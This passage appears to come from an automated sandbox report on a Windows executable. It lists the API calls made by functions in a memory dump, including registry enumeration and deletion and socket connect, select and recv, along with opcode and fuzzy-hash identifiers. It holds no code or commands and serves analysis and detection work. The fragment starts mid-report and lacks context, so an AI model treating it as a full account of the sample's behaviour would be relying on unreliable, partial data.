                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1886816560-0
                                                                                                                                                                      • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                      • String ID: %02X$p!A
                                                                                                                                                                      • API String ID: 1876335253-3420651641
                                                                                                                                                                      • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                      • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                      • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                      • API String ID: 4202809218-4073750446
                                                                                                                                                                      • Opcode ID: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                      • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                      • Opcode Fuzzy Hash: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                      • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,004074E0,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0040751C,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,004074E0,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0040751C,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue$Close
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2529929805-0
                                                                                                                                                                      • Opcode ID: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                      • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                      • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                      • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv$select
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 873784944-0
                                                                                                                                                                      • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                      • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.4775530028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.4775478331.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775594007.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775654106.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775712611.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.4775736919.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: select
                                                                                                                                                                      • String ID: (
                                                                                                                                                                      • API String ID: 1274211008-3887548279
                                                                                                                                                                      • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56